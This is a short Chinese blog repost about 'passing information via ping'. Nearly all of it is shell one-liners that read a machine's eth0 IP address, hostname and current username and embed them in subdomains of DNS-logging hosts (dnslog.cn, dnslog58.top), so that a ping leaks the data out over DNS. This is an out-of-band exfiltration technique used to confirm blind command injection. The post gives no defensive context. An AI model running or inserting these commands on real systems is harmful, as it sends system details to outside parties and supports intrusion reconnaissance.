ping命令传递信息
Posted huim
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ping命令传递信息相关的知识,希望对你有一定的参考价值。
IP:
# 适用于 eth0 inet addr: IP的情况
ping `ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk -F: '{print $2}'|awk '{ gsub(/./,"-"); print $0 }'`.vivo_fj_ip.q734y5p2.dnslog58.top
ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk -F: '{print $2}'`.kiwe2t.dnslog.cn
# 适用于 eth0 IP的情况
ping `ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk '{ gsub(/./,"-"); print $0 }'`.vivo_fj_ip.q734y5p2.dnslog58.top
ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'`.kiwe2t.dnslog.cn
hostname
ping `cat /proc/sys/kernel/hostname`.vivo_fj_hostname.q734y5p2.dnslog58.top
user
ping `whoami`.vivo_fj_use.rq734y5p2.dnslog58.top
以上是关于ping命令传递信息的主要内容,如果未能解决你的问题,请参考以下文章